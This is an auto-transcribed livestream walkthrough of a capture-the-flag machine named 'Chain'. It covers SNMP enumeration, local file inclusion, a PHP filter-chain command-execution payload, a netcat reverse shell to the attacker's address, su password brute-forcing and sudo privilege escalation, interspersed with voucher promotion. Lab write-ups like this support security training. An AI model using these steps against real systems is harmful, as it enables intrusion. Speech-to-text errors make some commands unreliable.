So guys, welcome back to a Pentester Club. So today we're going to solve another CTF challenge named called a chain. So this is a realistic attack. So how we would like to exploit it here. So what are the basic rules here? So last time in the yesterday I was provided the access code for the voucher code, but nobody yet reading it. So let me. We would like to go back here. So I'm telling you how to redeem this a voucher code. So let's come to here a subscription. Then click on the redeem voucher. So yesterday I was provided in the video that two vouchers. So I will also provide you again vouchers here. So try to redeem from here. Now let's come back here. Let's go to our CTF challenges. Now we are going to do trying this chain machine. Now, we would like to launch this machine. So, what are the basic penetration testing methodologies we used here? So, the basic penetration testing methodologies we used here: network discovery, enumeration, exploitation, privilege escalation, and capture the flag. Now, we would like to wait until this will launch. So, it may take a little bit less than 1 minute. So, we would like to wait for that. So sometimes it may can get like if your network is not clear, so you just need to restart it here. So just refresh this. So just try to copy your targeted IP address. Now let's come back here. Now first of all, you just type here as a ifconfig. So you have not connected to your targeted VPN. Let's type here as clear. Just type here as sudo open VPN vpn.ovpn. Now enter your password. Now we have successfully get connected here. Now let's come back here. Now let's come back. So we have started the mission also. Now what is our target? Is this is your targeted IP address. Now once you have get this targeted IP address, so just type here as sudo nmap -34 minus as an aggressive scan, enter our targeted IP address and enter our password. Now let's wait for the nmap result. So nmap result will take a little bit lengthy time process. So we need to wait for that to get a nmap result. A little bit lengthy time process. So the port 80 is available for us. So it was hosted in the Apache server. So quite interesting here. Now, if you would like to get here to identify there is any type of ports is going to be available. So you can utilize minus P in this case. So that you can get it the ports which are available. So I would like to so for the users here, I would like to provide you the voucher codes. There is approximately 17 users. So voucher code, you can have it here. So voucher code is, so I'll try to redeem this voucher code from here. I would like to show you here. Come back to here in the manage account. Then click on the subscription, then redeem the voucher. So just enter the voucher, whichever I was provided in the comment section box. So who is the first viewer, they can get this voucher code right now. Then try to redeem and try to access the labs and try to build up your skills. Now if you don't have vouchers, so you just click on go to a premium. We need to post this first. Click on premium. So here, whichever you require for premium for monthly or yearly. So you can get this get by monthly. So you can choose by your selected payment. So right now it's only working with the crypto, and you can proceed with a crypto. So you can get the voucher code directly. So if you would like to purchase, so every video I'm going to provide you two voucher codes for the customers. So now let's come back to here for learners. So now we got our IP address that is only with available with port 80. So that's quite interesting. Now we would like to visit our targeted IP address. So we just put here HTTP. Then let's look here. Chain. Don't worry, bro. The chain will show you the way. So let's we would like to try to view the page. So we would like to try to get here. We would like to get uh, this chain. Let's come back here. Now we just type here as wget, then let's just paste here. Where we have got this. Now we just try here as with the strings chain dot png, where we have got the private key RSA. So where we would like to utilize this one. So there is no SSH and nothing else from this here also. Now, how we would like to utilize this one. So we would like to try here. Again, let me just type here as clear. We just put here as sudo nmap. We would like to utilize here as a top ports. Just put for 100 and enter our targeted IP address. Let's just close this and this one. Enter our password. Now we would like to filter it out. So top 100 ports, we are seeing only the port 8. That's it. Now if I mention with the minus SU for SNMP port, it's maybe is available or not. We would like to try to wait for here. So maybe we can get with the 161. That also we would like to wait for here to look how we are going to get it out. So these nmap results may take a more unlengthy time process. So we would like to wait for it for this. So we would like to wait for this. So first time catching your live. Thanks for a lot. Videos helping me a lot enough through. It's my pleasure to help all. So try to reading this voucher code. Then later we would like to look it out. So try to reading this voucher code. Anyone who are watching the live, who want to practice the labs, let them try to reading the voucher. Now we would like to go back here. So it may taking more. It's almost all done. We are getting the results. So you can see here we have got it here, the hidden ports running in the targeted system. So that is with the port 68. It's in the UDP 161 with UDP and open with SNMP. Then 514 it's with the system logs. What else you are doing in the system logs? That also we are getting here. 623 is with the UDP and filter with ASF RMCP. That's quite interesting. Now we would like to clear here. Now there we have identified there is an SNMP port is open. We would like to try to exploit from that. We would like to go for as SNMP walk. snmp work. I would like to put for minus let's we would like to try here as minus minus help. Let's we would like to specify a version. uh, I would like to specify minus v2c version with the v2c. Then let's then later what else? We would like to utilize as apports. Set a various application to specify what's the system behavior it's going to running inside. Then what else we would like to utilize here? SNMPs, that's it. Containers user level engine ID. That's it. So print the number. That's it. So let's we would like to utilize here as SNMP walk minus V2C, then minus C. So I would like to utilize here as for a security and enter your targeted IP address. So this is your targeted IP address. So just write copy. Then let's come back here. Just write paste. Now let's wait here. So we have got a something here with the chain corporation. So this is quite interesting. Just write copy. Uh, we are getting here the MIB. So we are getting this a chain corporation NYX. Now let's we would like to try to copy this one. Now let's come back here. We just put here as sudo nano with etc hostess. Just try to paste this. Now let's come back here. Now I just try to copy our targeted domain. Then let's come back here. Try to paste. That's it. Just try Control O, Control X. That's it. Now, if we would like to go here, uh, there is a possible for a subdomain in this. Let's we would like to boot with the VM Linux, that Linux version. Then hexadecimal string, time stack, integer. No more variables left in the MIB view. Okay, the management information definitions for SNMP users based by a security model. Okay, now what we would like to look here. Uh, Now let's we would like to try here. Uh, we would like to try go with as a Ghost star. So before that, we would like to try to get some other useful word list. Let's come back here. Checklist GitHub. So just try to reject all. Let's go back here. What we would like to utilize here. We would like to go to here as discovery. Then let's go to DNS. So I would like to try to get this. Let it go inside that. Now try to download this. So I have downloaded this one. Now, we would like to utilize, let's go back here, Govastra minus help. We would like to utilize here as virtual host. We would like to hunt the virtual host. Let's just try to clear this. Let's just try also clear, yes, cat etc hostess. Now, let's come back here. Go with the Govastra virtual host minus u. Then let's just try to copy this one. Come back. Yeah, just try to copy. Come back, just paste here. Now, uh, wordless is, what is the wordless? Response here. Your targeted wordless is this one. Just try to copy. Come back, just paste here. That's it. Now, I would like to utilize here as a append domain. Now, this may going to go for a progress. We would like to wait. In what stage we are going to getting out this targeted domain. So, before that, we would like to look some other thing. So to give the image, then using the CyberSecurity to solve it, yes, it will solve, but better to use the normal only command line command interfaces. Now we would like to go back here. So before that, I would like to explain you one more time. So try to redeem the voucher, visit the targeted website. Then let's come back before this one. Come back here. So in this case, let's try to go to here as manage account. Then click on subscription. Then reading the voucher, enter the voucher code. That's it here. So you can try to reading the voucher. Then try to practice the labs. Now let's go back here. So how long it may going to be take here? So it may take more and lengthy time process also, but we would like to wait for this also. Now we would like to look here. So we would like to remove this off. So it may take more a lengthy time process also. So we would like to wait here. So it may take more and lengthy time process. So I just keep it this one as it is. Then now let's come back to here. I would like to try to filter my targeted word list uh, from where you need to filter from this. So just try to copy, come back, just try to come back here. There. I would like to put here as wordless.txt. Now, it was a filter right now. Now, let's utilizing this same thing, just go back, uh, come back here. This is the wordless. Now, come back here. So, when you try to do any type of CTFs, that may take a lengthy time process also to clear all these things. So, you would like to copy, come back and paste here. So, where I have got this one here. Now, let's just try to copy. We just put here as sudo nano, it is as hostess, enter your password, come back. Now, let's try to paste here. Type Control O, Control X. Once you have cleared this. So, this case, it take a lengthy time process. So, I have filtered out some other word list and I have got it here. Now, come back here. Now, visit to the targeted system. Now, you would like to look here a system utils or choose the desired utility to run it in the targeted system. Try here as ID, where you are getting here as user ID with the www.data. So we try to exploit it here automatically. Now let's come back here. IP. We are getting the IP address with the targeted IP address here. Now let's go here as this is a process shell. The system status where you are getting here username, we are getting everything from here. So we need to check everything here. This is with the Linux chain where we have got it here. Now let's come back here. It's with the uptime. This is a local time which was showing here. Now who am I? So that's with the www.data. Host name, it's with the chain. Quite interesting here. Now what we would like to do here. Now once we would like to go to here as a id.php, we would like to try to inject here as directly as etc as password. So where we are getting everything here. Let's you can look here root with everything. Smoke, pink, Debian, red, blue, everything. We are quite interesting. We have got the all usernames here. So where we are getting here local file inclusion, it's working here. Now if it local file inclusion is working, now let's we would like to remove this. Now we would like to go back here. We would like to utilize here as a PHP. filter convert dot base 64 encode. So we would like to encode this one. Then we would like to go here as resource. We would like to put here as a set. So where we have got this entirely, just try to copy, come back here. Now, so you can see here, this may take and will also occur a time error. Because if the server it does not support, it may give an error. So we would like to decode this one, echo. Then let's just put here as base 64 as decode. You can look here file to get in. If is a set of file, include a dollars with a file, where we have got this one here. Now we would like to go as a filter to the chain. So we would like to try to filter here. So for that, what we supposed to use here? We supposed to use as so PHP filter chain. We would like to get that one. So where we would like to get that one? Now we would like to walk to back here, come back here, we just put here as PHP filter chain generator. So the first one, you would like to visit the first targeted link. Then try to we just want only this one targeted one. Just try to take this one. Just try to copy, come back here. You just put here as nano php.python php chain.python. That's it. Just try to paste it. Type Ctrl O, Ctrl X. Now just type here as clear. Now, what you would like to try here? You just try here as php chain.python minus minus help. You would like to try to here content you want to generate. You will maybe need to pad with the spaces for your payload to work. The base 64 value you want to test, the chain will be printed as base 64 by PHP. So how we would like to try to generate here? I would like to generate only for a chain right now. Let me just type here as clear. Now chain. Now we would like to write here our PHP payloads. Let me just write here. Just before that, PHP system list minus LA. Then let's just close this. Then let's just close this also. So this is a payload. Let's we just try here. That's it. So it was generated everything here. Now we just try this. So you just need to try to copy this one. Now you need to copy and now we would like to visit here. Where is this? So in the include.php, just try to paste this. Let's now we would like to remove this. Let's go back. We would like to remove from here, then try to paste it. Now it's coming in a wrong way. Now how we would like to try to put here. So for that case, we would like to go back here. So we need to understand where we would like to put this one. Now we would like to look here. So if we would like to put here, in this case, let's come back here. So if you would like to try to put here, in this case, so it's not going to be work out also. So let's close this. So better for without utilizing this and all nonsense, I would like to uh, generate another one. Let me. This is will give you an error. Now we would like to write as another command here. Let's we would like to write as another command, like we would like to utilize here system. You just close this. Just put here as $_get. Then put it here as in the cmd. Close this and this. That's it. Now just type Control O. Just try to copy everything. Now let's go back here. Now try to paste here where we have got it here. Now because there is no a cmd command prompt to get any type of data, otherwise list or to get list IDs or everything to come to a root access. Now we would like to try to copy this entirely. So copying like this is too difficult. Let's just try to copy from here, come back here. Now you just try to you can look here. So this is not going to be weaving you. So where everything just paste here in the 10 and cmd equal to, you just put here as a id where we are getting here as www.data. Now quite interesting. Now let's come back. Now we would like to remove this php filters. Now cmd equal to, I would like to write here as come back here in the next step. It may take a lengthy time process also. Let me just type it as clear netcat minus lvnp 7890, where we are going to go for a connection. CMD equal to netcat minus e bin bash. You need to enter your targeted IP address. So here your targeted IP address is config. So this is your OVPN targeted IP address, not your local VPN IP address. Then 7890, that's it. Where that was get the root access automatically. I mean, it was connected to the machine directly here. Now your target is, now we would like to try here as a script dev or no minus c, as I would like to enter as a bash. Now we are get it from the bash script. Now what we would like to try here. Now we are in the virtual host. We are already come here. Let's just type here as id. We are getting here id. We just type here as a export term equal to extra. We have got it here. Now let me just type here as clear. Now we would like to go to as a home directory. Now we would like to type here as minus a. Now we have a two directories here. One is with the blue. Go here. Permission is denied. Okay. See as red. Permission is denied. Now we would like to try to create a word list for this. So how we would like to try to create a word list, and also we would like to try to get from here. We would like to open this. We would like to try to get from SU forts to crack that password. Let's come back here. SU forts GitHub. Let it go and get this one first. This is this one. Let's get it from here. No need to go for actions. Always need to come for just go to here. Otherwise, just try to download this. So we have downloaded this SU force. Now just type it as here. Now we have a SU force. Quite interesting, this one. Now we need to generate a word list. So it's like the blue and blue sky. So I would like to get utilize a crunch to generate a word list. Otherwise, I would like to use the rocky.txt, but taking from entirely your rocky.txt into the cloud machine. It's take lengthy time process and you can waste a lot of time. So for that, you can utilize some other word list. Like I would like to utilize here as crunch. Let's 2 7, then sky blue, output as password.txt. That's it. Now just put here as a mousepad password.txt. So it may take a long lengthy time process to crack this one. So let me, I would like to utilize here as a crunch to sky blue as output as password.txt. Now let me just type here as clear. You just put here as a mousepad password. Uh, now let's it is with 7 by 7. Let's, we would like to put by 7 by 7. So it's take a lengthy time process also. We would like to try here. So let me, I would like to try to uh, I would like to try to filter out this one. Let's just go to here as a print as with the sky blue. Let's just put with as dollars as 0. Then let's just close this. Then uh, put here as password.txt. So it's me generating a lot of things, but we would like to try here. Let's we would like to put here as echo temp.txt. Now uh, okay, now echo we just use as, so better than this one. Let's we would like to remove this password.txt. Let me we would like to utilize here as nano password.txt. So for generating a crunch and sorting that one, it may take long and lengthy time process also. For that, I would like to utilize here as sky blue, blue sky, sky blue, red, red, red blue, blue red, blue red, blue, then root, then chain, chain root, CTF. So I am using some other wordless here for this. Let we would like to utilize this one. Uh, then what else we would like to put here as, that's enough. So why going with the larger things, so that may take lengthy time process also and wasting too much time. Now let's, we would like to look here. Now we would like to look here to give image using CyberSecurity. That's over 427. So what is your 427? I not understand. Let's come back here. Now, here, we would like to look here. In this, put here as Python minus M. We would like to look here as first type here as clear plus minus L. Python minus M. HTTP dot server. Now, we would like to go to here as stem directory. We just type here as clear. We just type here as wget http. Enter your target IP address 10.8.0.5. So always you just need to utilize your OVPN target IP address, not your local IP address. So many people they're going to confuse here. So just try to copy this one, come back, try to paste here. So where you have got it here. Now just put here as wget http 10.8.0.5 with the 8000, then password.txt, where we have got both one. Now we would like to go for utilizing this one. Let's just type here as clear plus minus L plus minus L. So you just need to give a executable permission for this SU force. Just try to copy, then paste here. Now let's just type here as clear. Now just post here. Now type here as minus help SU force. Now you need to put the user and the word list. So I would like to utilize here user for SU force, then user for blue, then word list is password.txt. That's it. Now it will try to go for cracking the password. So it says password not found in the 13 cases. So again, we would like to go back here. Come back here. In this case, we would like to come back here. Here only. Let's just type here as clear plus minus here. Nano password.txt. So we are not get anything else here. So how we are going to get this one? So we would like to try to close here. Now let's we can try here again. No, I was enter mistake. SU force minus U. As for blue, one is password.txt. Let's can try here. So I have identified the password. It's a Skype. So I just type here as SU as a blue. Now it asking the password, just write copy and enter. So and enter here, we are successfully came to the blue. Now what else we would like to get here? Now let's go to here as CD home blue. Then let's just type here as clear. Type here as clear. Now just type plus minus L. Now we need to get a user flag. Just put here as get user.txt. So we have got the user flag. Just try to copy, come back here. So in our case, what is the user flag? We have identified the user flag, then try to submit here. So we have given the right answer here. Now, later we would like to find only the root case for to get the root access. So we have identified here. So we would like to go back here. Now just write here as sudo minus l. It's going to be run as CPU limit. Now just try to copy this CPU limit. Now let's go back here. Now come back to here. GDFO bins. We would like to go to GDFO bins and get the CPU limits. Just go to here. Now try here as CPU limits. Get to here as sudo CPU limit minus L. So we would like to utilize for our user so for that we would like to utilize here as sometimes there is not available here. So CPU limit user for red, then you need to utilize here as this one. No, you don't need to copy and paste this one, CPU limit. Then you need to utilize from here minus L bin bash. That's it. So you can copy from the browser. That does not affect, that also affect here. Minus L 100 minus F bin bash. That's it. Now we successfully come to the red. Now let's come back here. CD, let's go to as red. Now let's come back here as clear. Type plus minus L. In the red, we not get anything else. Here is an useful. Now, what we would like to look here? We are in the red automatically. Now, again, we would like to run here as sudo minus L. We would like to go here as smoke keeping. Again, let's go back here. Come back to here. Smoke keeping. So we not get this smoke keeping. So how we would like to try here? To get a root for root, just try to copy this one. Now we would like to try here. For this also a no password. Sudo user. Oh, sorry. User has been smoke keeping. I would like to try here as minus help. Let's like to utilize here as show the man page of the program. We would like to utilize here as man. Let's come back here. Sudo minus L. Sudo user has been smoke keeping. Then I would like to utilize has minus man in this man place. So you just need to enter here as bin bash. So where you have successfully came to a root access here. Now just write ID. We have got it here as ID. Now cd as a root list minus a. Now we have got here as cat a root.txt. So we have find the root.txt. Just write copy, come back to our chain, then enter here the root flag, try to submit. So we have successfully completed this mission. That's it here. So if you have any doubts, you can ask me here. I can give you a response. So to reading the voucher again, for that let's I would like to demonstrate one more time. So once you are completed, you just try to terminate this machine. That's it here. Once you have terminated, now let's come back to your access page. So in the subscription, now here you need to get the code. The code is, so I would like to, I have provided already one code. I'm going to providing you another one more code. Here is just a hacker. So this is another voucher code. Just try to redeem it from here. So let's you need to try to redeem here. That voucher here is a hacker. Try to redeem and try to solve the CTF challenges by yourself. That's it. So you try to run, guys. Thank you guys for watching and keep smiling.